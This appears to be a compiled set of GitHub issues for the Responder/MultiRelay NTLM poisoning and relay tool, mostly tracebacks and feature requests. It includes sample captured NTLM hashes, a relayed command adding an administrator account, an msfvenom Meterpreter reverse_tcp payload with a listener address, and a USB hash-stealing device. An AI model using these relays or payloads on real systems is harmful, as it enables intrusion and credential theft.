Found these issues randomly

Exception happened during processing of request from ('...102', 63777)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in init
self.handle()
File "//Responder/servers/HTTP.py", line 269, in handle
Challenge = RandomChallenge()
File "/*/Responder/utils.py", line 32, in RandomChallenge
Challenge += NumChal[i:i+2].decode("hex")
File "/usr/lib/python2.7/encodings/hex_codec.py", line 42, in hex_decode
output = binascii.a2b_hex(input)
TypeError: Odd-length string

search everywhere , but couldnt find any solution,
Tried adding "strip()" to NumChal[i:i+2].decode("hex")
Errors remain same but another error is thrown also

Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
[!] Fingerprint failed
self.finish_request(request, client_address)
[!] Fingerprint failed
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 654, in init
172.168.9.113 - - [24/Jan/2017 07:06:28] "CONNECT microsoft.stream1.fyre.co:443 HTTP/1.1" 404 -
self.finish()
File "/usr/lib/python2.7/SocketServer.py", line 713, in finish
self.wfile.close()
File "/usr/lib/python2.7/socket.py", line 283, in close
self.flush()
File "/usr/lib/python2.7/socket.py", line 307, in flush
self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe

any one please help

I can't seem to get LDAP to require NTLM C/R auths. Is this not implemented?

Would it be possible to use MultiRelay with a net range instead of just one target?

RunFinger.py contains an issue within GetHostnameAndDomainName that will prevent proper execution of RunFinger or MultiRelay when a systems uses the maximum 15 character domain/workgroup name:

def GetHostnameAndDomainName(data):
	try:
		DomainJoined, Hostname = tuple([e.replace('\x00','') for e in data[81:].split('\x00\x00\x00')[:2]])

When the maximum length domain/workgroup is used, the SMB response does not contain the standard delineation of \x00\x00\x00. As such, the Hostname will wind up empty, where the DomainJoined variable will contain the Domain concatenated with the Hostname. For example, configuring a workstation with:
workgroup: ABCDEFGHIJKLMNO
hostname:123456789012345

$ ./tools/RunFinger.py -i 192.168.37.138
Retrieving information for 192.168.37.138...
SMB signing: False
Server Time: 2017-03-09 14:48:09
Os version: 'Windows 8.1 Enterprise 9600'
Lanman Client: 'Windows 8.1 Enterprise 6.3'
Machine Hostname: ''
This machine is part of the 'ABCDEFGHIJKLMNOAB123456789012345' domain

The function receives the following data (typecast hex):
0000008dff534d42720000000080000000000000000000000000000000003c1b000001001100000332000100041100000000010000000000fce3010079c8a0df1699d20168010848004439bab2cc928d184100420043004400450046004700480049004a004b004c004d004e004f0041423100320033003400350036003700380039003000310032003300340035000000

Logic looks for the split past [81:], however it does not exist. Instead we have:
Workgroup: 4100420043004400450046004700480049004a004b004c004d004e004f004142
Hostname: 3100320033003400350036003700380039003000310032003300340035000000

This issue prevents MultiRelay from working in situations that trigger the issue within RunFinger.py

I'm suggesting an enhancement I'd be happy to make a pull request for or offer up to someone more experienced with the project.

Responder is capable of logging it's findings in the "logs" folder. That's really helpful and useful, however if a pen tester was operating covertly (or on a machine they may lose access to) it may be concerning if that information is taken by another party.

I'd like to purpose a feature supporting asymmetric cryptography of these log files. In this way a pen tester could give a public key to Responder, who would then encrypt the findings. Then, at a later time, the pen tester could move those encrypted files off the box and decrypt them on their local machine.

Any thoughts on this? Would it be alright if I submitted a pull request with these enhancements?

./Responder.py -I eth1 -fwrdF
eth0 192.168.1.0/24
eth1 192.168.163.0/24

But instead of eth1, eth0 was engaged, but it should not.
As you will see below, Responder poisoned subnet which did not suppose to do.
Please, correct me if I am wrong. Also I may contibute this issue, If you will help me in localization the bug.

I am not sure if this is possible but would it be possible to have multi relay replay requests on a different interface then the one from which Responder captured them?

It would be nice to have a flag that automatically prefixes all output with a date timestamp:

[20161018-03:15:00 -400] - [HTTP] Sending NTLM authentication request to 192.168.1.100

OS: Max OSX High sierra

Sorted most of the services running stopping responder from working correctly apart from the last few.

[!] Error starting UDP server on port 5353, check permissions or other servers running.
 [!] Error starting UDP server on port 137, check permissions or other servers running.
[!] Error starting UDP server on port 138, check permissions or other servers running.
[+] Listening for events...

I believe this requires

sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist

Due to SIP being enabled this cannot be done, is there a workaround for this ?

Responder: NBT-NS, LLMNR & MDNS Responder 2.3.3.6
John: 1.7.9 // 1.8.0

I just ran a quick test in my LAN and captured few HTTP and SMB requests.

But John cant load any hashes. Googled already, youtubed already - no real solutions. Any help?

Samples:
HTTP-NTLMv2-192.168.2.33.txt
Administrator::x1x1x:1122334455667788:7213E007EDB84BEDD93F240FDB4EC121:0101000000000000315145AB4ECFD2013D8D5700DD6CF077000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C0008003000300000000000000000000000003000002664A63166E32CBAA3447EEA408DF45973965113A1AED458CF2F97470F339A5E0A00100000000000000000000000000000000000090000000000000000000000

SMB-NTLMv1-SSP-192.168.2.241.txt
Administrator::HOST:90784AF285BB06F600000000000000000000000000000000:5389E501F8B30519F09E3AA1BEFAF7DC25EF64218A65FF10:1122334455667788

SMB-NTLMv2-SSP-192.168.2.249.txt
Administrator::WIND3PL17LAJ:1122334455667788:61737F2E1ED94D5969546C8B25AE7776:0101000000000000CA1D35C4BED0D2011DF1919B2AD453860000000002000A0053004D0042003100320001000A0053004D0042003100320004000A0053004D0042003100320003000A0053004D0042003100320005000A0053004D00420031003200080030003000000000000000000000000030000087583DDD7BDF5834825CF32D94271794E6587C57294676F77C427EE0826419CF0A001000000000000000000000000000000000000900240063006900660073002F00390035002E003200310035002E00340035002E003200330036000000000000000000

HTTP-NTLMv2-192.168.2.170.txt
Administrator::RT1200:1122334455667788:D6A02E88F13E0A7051F124A5BCCBB048:0101000000000000CCE547EDFFFBD201F4C445323A5125E7000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000000000000030000066DC82B65FF0ED9967E20ADC796929C2150AF6CA4F8E372A688631DF92B0D52A0A001000000000000000000000000000000000000900200048005400540050002F006F007400740069006D00650078002E0063006F006D000000000000000000

john HTTP-NTLMv2-192.168.2.170.txt

No password hashes loaded (see FAQ)

john --format=netntlmv2 HTTP-NTLMv2-192.168.2.170.txt

Unknown ciphertext format name requested

I'm on a project turning a Raspberry Pi Zero into a stand-alone USB over Ethernet pawning device.
To do so the ideas of @samyk and @mubix have been extended. The project relies heavily on Responders capabilities to serve HTML content and to force authentication on requests to "wpad.dat" / "*.pac" or on Proxies after redirection based on wpad.dat.
Unfortunately these two capabilities could not be combined (if Serve-Html = On, wpad.dat doesn't get delivered, neither is authentication forced). I have added in an config option to enable the described behavior, called Serve-Html-Provide-WPAD-anyway

Additionally, as I'm (mis)using Responder as stand-alone web server with Serve-Html = On. Targeting Windows machines, there was a need to cope with Microsoft's connectivity tests (f.e. to "http://www.msftncsi.com/ncsi.txt" on Win 7). I added in an option Serve-Html-Simulate-Internet to serve the correct HTTP responses to those requests, while running with Serve-Html = On

Below is a short feature description of my (yet unreleased) project, but I think the Responder modification could be useful for everybody else, thus I'm starting a PR. Merging this would help me again to keep my projects setup script clean, as I would be able to clone from your repo, without further patching.

Feature of my project (see notes on Responder)

# Notes/Features:
#       - A composite device for Ethernet over USB is presented, providing RNDIS for
#       Windows and CDC ECM for Linux/Unix
#       - The windows setup supports automatic driver installation, by adding Microsoft
#       OS Descriptors to the USB descriptor (tested on Windows 7 and Windows 10).
#       - The Setup works well on USB 2.0 Ports (only in some cases on USB3.0)
#       - The script detects if RNDIS or CDC ECM is used, by polling the link state
#       of both internal interfaces. If RNDIS (usb0) is detected to be active CDC ECM gets
#       disabled (usb1). If CDC ECM (usb1) gets link, RNDIS (usb0) will be disabled.
#       If neither one gets link both are disabled after RETRY_COUNT_LINK_DETECTION attempts.
#       - Because only one adapter is used after link detection, the DHCP setup DOESN'T
#       DIFFER BETWEEN Windows and Linux. This comes in handy if this should be used to trigger 
#       reverse connections, as the IP of the Raspberry is always known.
#       - The initial idea was to run NTLM hash stealing, as shown by MUBIX, which unfortunately
#       seems to be addressed by Microsoft with MS16-112.
#       - To allow capturing hashes anyway, the setup has been combined with Samy Kamkar's approach
#       of choosing a large IP subnet (1 Bit network mask) to capture HTTP traffic to all IPs fitting
#       into this network mask. Responder is used to answer HTTP requests with content containing
#       a SMB redirect, which lands at Responder's SMB server again and should help to capture
#       NTLM hashes in a more generic way.
#       - To behave like intended, Responder.py has been patched with the following functionality:
#               1) If "Serve-Html" is set to on, responder delivers the same Page, no matter what is requested.
#               This behavior has been changed, to deliver the Custom WPAD script if "/wpad.dat" or "/*.pac"
#               is requested.
#               2) If Responder runs without upstream (not forwarding to Internet), like in this setup, Windows
#               detects that the new network has no Internet access. An option to answer connection tests in a manner
#               to make Windows believe Internet is accessible, has been added (at time of writing only for Windows 7
#               IPv4, which checks for "http://www.msftncsi.com/ncsi.txt"). This should help to keep the network enabled
#               and traffic flowing through the raspberry.

I assumed that one Proxy_Auth instance would be created per TCP Connection. But it seems like a new Proxy_Auth instance is created per request. Therefore different Proxy_Auth instances and thus different challenges are used for packet type 0x1 and 0x3 of an NTLM authentication.
All in all the hash written to the db is wrong because the challenge is wrong.
This seems like an architectural problem. For now i use a fixed challenge to circumvent that.
I expect the HTTP module to have the same problem but i haven't confirmed that.

Maybe the default challenge should be set to a fixed value until this is fixed.

If you specify -c after -u for MultiRelay, the entered command will show up in the user whitelist array.

Example:

./MultiRelay.py -t 172.16.60.41 -u ALL -c whoami

Relaying credentials for these users:
['ALL', 'whoami']

However, this doesn't seem to influece the behaviour of the tool.

[+] Authenticated.
[+] Running command: whoami

Dump sent/received messages into text fie or stdout.

It would be nice to have the option of turning on a setting that would switch both the proxy (3141) as well as the HTTP/S port (80/443) to push back to clients saying that they need to authenticate before accessing the website they are trying to get to. Once a cred is captured, allowing them through to the site (3141) or to the current 80/443 setup does would be the preferred method

Is smbrelayx still required with the new multi-relay stuff?

python SMBRelay.py -i [REDACTED] -c 'net user pentest [REDACTED] /add &&net localgroup administrators pentest /add' -t [REDACTED] -u Administrator

Responder SMBRelay 0.1
Please send bugs/comments to: [email protected]
Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..
Usernames to relay (-u) are case sensitive.
To kill this script hit CRTL-C or Enter
Will relay credentials for these users: Administrator

Target is running: ('Windows Server 2008 R2 Datacenter 7601 Service Pack 1', 'Windows Server 2008 R2 Datacenter 6.1')
Unhandled exception in thread started by <function RunInloop at 0x7fed3538e0c8>
Traceback (most recent call last):
File "SMBRelay.py", line 406, in RunInloop
worker = RunRelay(Target,Command,Domain)
File "SMBRelay.py", line 223, in RunRelay
s = socket(AF_INET, SOCK_STREAM)
TypeError: 'module' object is not callable

Hi,

I edited the original SpiderLabs version to do:

python Responder.py -I eth0 -wF -i 8.8.8.8

To force all requests that come to me, to poison to a value of 8.8.8.8.

:( I think changes to ICMP-redirect.py broke this.

Is there any way you fix this?

Hi guys,
I'm getting the following error sporadically when running responder :

Exception happened during processing of request from ('aa.bb.cc.dd', 57785) Traceback (most recent call last): File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request self.RequestHandlerClass(request, client_address, self) File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ self.handle() File "/home/--user--/sec/tools/Responder/poisoners/LLMNR.py", line 51, in handle Name = Parse_LLMNR_Name(data) File "/home/--user--/sec/tools/Responder/poisoners/LLMNR.py", line 26, in Parse_LLMNR_Name NameLen = struct.unpack('>B',data[12])[0] IndexError: string index out of range

Let me know what other information would be helpful

While running latest version of responder I got below error

root@kali:~/Responder# python Responder.py -I eth1

[+] Listening for events...
[*] [NBT-NS] Poisoned answer sent to 10.7.1.2 for name CDE (service: File Server)

Exception happened during processing of request from ('10.7.1.2', 137)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in init
self.handle()
File "/root/Responder/poisoners/NBTNS.py", line 75, in handle
'AnalyzeMode': '0',
File "/root/Responder/utils.py", line 236, in SavePoisonersToDb
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
OperationalError: no such table: Poisoned

[*] [NBT-NS] Poisoned answer sent to 10.7.1.2 for name IT (service: File Server)

Exception happened during processing of request from ('10.7.1.2', 137)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "/usr/lib/python2.7/SocketServer.py", line 652, in init
self.handle()
File "/root/Responder/poisoners/NBTNS.py", line 75, in handle
'AnalyzeMode': '0',
File "/root/Responder/utils.py", line 236, in SavePoisonersToDb
res = cursor.execute("SELECT COUNT(*) AS count FROM Poisoned WHERE Poisoner=? AND SentToIp=? AND ForName=? AND AnalyzeMode=?", (result['Poisoner'], result['SentToIp'], result['ForName'], result['AnalyzeMode']))
OperationalError: no such table: Poisoned

[+] Exiting...
root@kali:~/Responder#

I thought this was working, but it seems that request w/ the OPTIONS header is getting hit with an auth wall now"

OPTIONS /stuff/ HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: 192.168.1.100

Results in this:

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/6.0
Date: Wed, 12 Sep 2012 13:06:55 GMT
Content-Type: text/html
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
Content-Length: 0

I just updated Responder (from github - with gut pull) and in line 241 of Responder.py it is looking for servers/HTTPS.py (from servers.HTTP import HTTPS), but it is not found (ImportError: cannot import name HTTPS).
Is something missing here? A temporary workaround is to change HTTPS to Off in Responder.conf

When echoing a comma character (,) in a MultiRelay shell, an error occurs: "The command failed or took too long to complete." Escaping the character does not fix it, see screenshot. Possibly a sanitization issue?

This makes it especially hard to upgrade to a more dynamic shell because commas are often needed in powershell and vbscript scripts that are echoed into a file.

Responder crashes when run in analyze mode if an ipv6 nameserver is defined in /etc/resolv.conf

Traceback (most recent call last):
  File "Responder.py", line 310, in <module>
    main()
  File "Responder.py", line 225, in main
    from poisoners.LLMNR import LLMNR
  File "/home/pi/Responder/poisoners/LLMNR.py", line 45, in <module>
    IsICMPRedirectPlausible(settings.Config.Bind_To)
  File "/home/pi/Responder/poisoners/LLMNR.py", line 39, in IsICMPRedirectPlausible
    if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
  File "/home/pi/Responder/utils.py", line 56, in IsOnTheSameSubnet
    ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
ValueError: invalid literal for int() with base 10: 'xxxx:xxxx:xxx:xxxx::x'

Using something like this './MultiRelay.py -t 172.16.60.41 -u ALL -c whoami' on a german windows results in the following output:

Retrieving information for 172.16.60.41...
SMB signing: False
Os version: 'Windows 7 Professional 7601 Service Pack 1'
Hostname: 'PC01'
Part of the 'XXX' domain
[+] Setting up HTTP relay with SMB challenge: 9a6aa4fbb096455b
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, bob has admin rights on C$.
[+] Authenticated.
[+] Running command: whoami
nt-autorit�t\system

The last line should actually read "nt-autorität\system" (german a umlaut).

Got the below error while running new Report.py module.

python Report.py

[+] Generating report...
[+] Unique lookups ordered by IP:
Traceback (most recent call last):
File "Report.py", line 87, in
GetUniqueLookups(cursor)
File "Report.py", line 61, in GetUniqueLookups
res = cursor.execute("SELECT * FROM Poisoned WHERE ForName in (SELECT DISTINCT UPPER(ForName) FROM Poisoned) ORDER BY SentToIp, Poisoner")
sqlite3.OperationalError: no such table: Poisoned
root@kali:~/Responder#

Any way to bind to virtual interfaces ? eg: eth0:0

Hello,
I have found maybe an issue. Currently it seems that responder is only able to collect hashes from single user Name like "DemoUser" if there is a space in the Username like "Demo User" the script tries to collect the hash from "Demo" which doesn't exist on the machine.
As a target I used a Windows 10 1607.
Sincerley
Jan

Is there any reason the challenge shouldn't be random? Or does it make more work on the cracking side?

Just to drop a quick suggestion, it would be great if multirelay had an easy way to send a shell back to metasploit for a meterpreter connection.

Also i noticed today the multirelay 'get' option doesn't handle spaces in words, i tried various combinations of backslashes and quotes to no avail. It also doesn't seem to be able to download folders. The quote and blackslash handling also contributes to my original suggestion, since i couldn't manage to send complex powershell commands through the multirelay shell.

Hey there!

I was so pumped to try the new version of Responder that I rebuilt my Kali box and did nothing but the full rounds of apt-get update/upgrade to have the latest/greatest everything.

With the new Responder, what I'm finding is regardless of which mode I run it in, after any event happens I get a long "Exception happened..." error. I scanned the README and don't think I'm missing any pre-reqs or config steps. But I'll look at everything again and reply if it turns out to be PEBCAK :-)

If you use the -u ALL switch, MultiRelay should know to ignore usernames ending in $. In my experience, these are "machine hashes", and I've never seen them be usable to gain access to a system. It's just noise and authentication failures to send them at all as far as I can tell. (If this understanding is wrong, please correct me. I've never found any tutorials or guides that utilize the machine hash to compromise a system.)

Any chance you could add the option to run a single command (stager command,etc) on the target instead of dropping to a shell to multirelay?

Hey,

Could you please provide binaries for windows of recent Responder release like the one you did for 2.1.3 https://github.com/lgandx/Responder-Windows

new version doesn't seem's to be compatible with pyinstaller.

Looking forward to your reply.

Thanks
Aditya Agrawal

Would it be possible to add a command line switch to have Responder only spin up the credential stealing services and not poison the LAN? This would make using Responder for phishing so much easier.

I cannot confirm that we experienced account lockouts because of MultiRelay, only that we were experiencing account lockouts while running it.

Notice that the REDACTED user returned logon_failure and said "Not forwarding anymore to prevent account lockout" yet it continues to forward that account:

[+] Setting up HTTP relay with SMB challenge: 47f6d8ef79000000
[+] Received NTLMv2 hash from: 10.11.1.159
[+] Client info: [‘indows 8.1 Enterprise 9600’, domain: ‘REDACTED’, signing:‘False’]
[+] Username: REDACTED is whitelisted, forwarding credentials.
[+] User REDACTED\REDACTED previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout

[+] Setting up HTTP relay with SMB challenge: 19ff304ed7000000
[+] Received NTLMv2 hash from: 10.11.1.159
[+] Client info: [‘indows 8.1 Enterprise 9600’, domain: ‘REDACTED’, signing:‘False’]
[+] Username: REDACTED is whitelisted, forwarding credentials.
[+] User REDACTED\REDACTED previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout

Hi there,

if the MultiRelay target IP is the same IP as the request source, I'm unable to pwn the host. From my understanding, this should still work, if the user got the right permissions (which he does in my case (domadmin)). Any idea why this fails? I didn't get any events in the Events Logs or any other kind of error. It just hangs at "SMB Session Auth sent."

Example:

Retrieving information for 172.16.60.43...
SMB signing: False
Os version: 'Windows 7 Professional 7601 Service Pack 1'
Hostname: 'VICTIM'
Part of the 'XXX' domain
[+] Setting up HTTP relay with SMB challenge: 304d7e8ae7fd8020
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: 53e6bdf9e74a60a8
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: dee8991c69c1f474
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: 00d5290e757f2f6f
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Setting up HTTP relay with SMB challenge: e88b1f8cddebdaad
[+] Received NTLMv2 hash from: 172.16.60.43
[+] Client info: ['Windows 7 Professional 7601 Service Pack 1', domain: 'XXX', signing:'False']
[+] Username: bob is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.

Will responder capture across a br-lan interface?

I set up a lab about:
inventory pc: win10 172.24.20.65
middle: kali 172.24.20.81
target: win2008r2 172.24.20.57

workgroup enviroment.

I used responder to poison inventory pc, and relay to target by middle.

1. use MultiRelay will return a logon_failure
   

2. use SMBRelayX will return access_denied, I know this error cuz target has UAC on.
   

Why use the same environment, two tools returned to the different results?

I am currently using this responder on my nethunter with usb tethering on my oneplus1. I get a fingerprint host failed error whenever I use it with screen locked on my Win10Pro. It works with Screen unlocked too, but only as a MITM wpad method. It doesn't capture the NTLM hashes when the Windows is under workgroup.

Hi there,

if I try to use a meterpreter powershell payload inside the MultiRelay shell, strange things start to happen :)

Example:
#Create Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.60.178 LPORT=4444 -e x86/shikata_ga_nai -f psh-cmd

#msfvenom output with a length of 6447 chars in total:
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnA
...
QAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

• If I just paste it into the shell, my payload will be cut into several pieces and fed to the client resulting in no compromised host.

• If I specify the payload inside the -c parameter, MultiRelay will crash with the Message "Something went wrong"

I could set up a http server to get the file with powershell, but it would definitely be nice if I could just throw the payload inside the shell.

Thanks for looking into this.

MultiRelay.py : lines 561 -570 Implements the "-c" options as follows:

    ## Run one command.
    if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
        print "[+] Authenticated."
        if OneCommand != None:
           print "[+] Running command: %s"%(OneCommand)
           RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
        if Dump:
           print "[+] Dumping hashes"
           DumpHashes(data, s, Target[0])
os._exit(1)

The issue here is that it is calling the function "RunCmd" with only 8 arguments when it should be calling it with 10 arguments.

MultiRelay/RelayMultiCore.py defines that function :

def RunCmd(data, s, clientIP, Username, Domain, Command, Logs, Host, RunPath, FileName):

This causes that calling MutliRelay.py with the "-c" option fails to execute the "OneCommand" argument, and hangs there because the exception is not properly handled.

I fixed this issue by implementing the "OneCommand" execution as you implemented the normal "cmd[]" execution. MultiRelay.py: lines 755-766.

The end result that worked for me is:

## Run one command.
    if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
        print "[+] Authenticated."
        if OneCommand != None:
           print "[+] Running command: %s"%(OneCommand)
           try:
                if os.path.isfile(SysSVCFileName):
                      FileSize, FileContent = UploadContent(SysSVCFileName)
                      FileName = os.path.basename(SysSVCFileName)
                      RunPath = '%windir%\\Temp\\'+FileName
                      data = WriteFile(data, s, FileName,  FileSize, FileContent, Target[0])
                      data = RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0], RunPath,FileName)
                else:
                    print SysSVCFileName+" does not exist, please specify a valid file."
           except Exception as e:
               print "Ups! something went wrong while calling RunCmd\n"
               print e
        if Dump:
           print "[+] Dumping hashes"
           DumpHashes(data, s, Target[0])
        os._exit(1)

Perhaps you could add this fix to the code as well.

Whenever I run DumpHash.py, it spits out an error. For whatever reason, I got some weird output in my Responder that looks like Chinese characters. I believe this might be the root cause.

Dumping NTLMV2 hashes:
Traceback (most recent call last):
  File "./DumpHash.py", line 43, in <module>
    v2 = GetResponderCompleteNTLMv2Hash(cursor)
  File "./DumpHash.py", line 31, in GetResponderCompleteNTLMv2Hash
    Output += '{0}'.format(row[0])+'\n'
UnicodeEncodeError: 'ascii' codec can't encode characters in position 0-1: ordinal not in range(128)

             ��Ò舕̆▀ༀ叧쀮玘ਤ埘钮hostname
[SMBv2] NTLMv2-SSP Hash     : 䵌卓P���¢��º��Xv��
                                                ��Ò舕̆▀ༀ叧쀮玘ਤ埘钮hostname::䵌卓P���¢��º��Xv��
                             ��Ò舕̆▀ༀ叧쀮玘ਤ埘钮S:49b183a9c2971aff:4C4D535350000300000018001800A200:000018001800BA0000001E001E00580000000E000E00760000001E001E008400[redacted]

With a number of different scenarios I've been in the situation where I was the gateway for a host. When they perform detection on if they are Internet connected (random host lookup), it would be nice to respond to these in the DNS server with what is supposed to happen naturally (NXDOMAIN)

I often end up with tons of machine account hashes in my responder logs that are not as useful for cracking as regular user accounts. It's easy enough to grep these out, but it would be nice to have an option for responder to ignore those hashes.

Hello

I wondering if there is a way to Capture hashes just by browsing the web , the only way I seem to find is by accessing an incorrect location on the network for example \Printsrv

What if the user on the targeted machine never access an incorrect location, does it mean you will never be able to get the hashes?

I've seen tutorials on YouTube that its possible with older versions of Responder , but I can't do it with version 2.3.3.6

Any help would be appreciated

$ ./RunFinger.py -i 192.168.1.0/24 -g
['192.168.1.13', Os:'indows Server 2008 R2 Standard 7600', Domain:'MAFEKING', Signing:'True', Time:'2017-08-18 14:20:52']

Purely cosmetic, obviously.

As I understood currently MultiRelay creates-starts-stops-uninstalls a service for each command line parameter we want to execute on the victim host. https://github.com/lgandx/Responder/blob/master/tools/MultiRelay/RelayMultiCore.py#L829
This is extremely inefficient, and also triggers alarms on IDS systems.

My suggestion is to use something like Impacket uses. It basically creates one service that opens it's own SMB pipe that accepts commands to execute in a separate process. (also, the solution is open-source, unlike the current method) Since the pipe-handling is already implemented in this library, I believe it would be fairly easy
https://github.com/CoreSecurity/impacket/blob/master/impacket/examples/remcomsvc.py
https://github.com/kavika13/RemCom

Currently if the "same" user comes in that is already in the database then an authentication attempt is ignored, even if it's a different hash. This has resulted in missed hashes because of user's multiple attempts to authenticate using "other" passwords as well. I can't find an option to disable this work flow.

I'm seeing this happening alot (see screenshot) is this normal?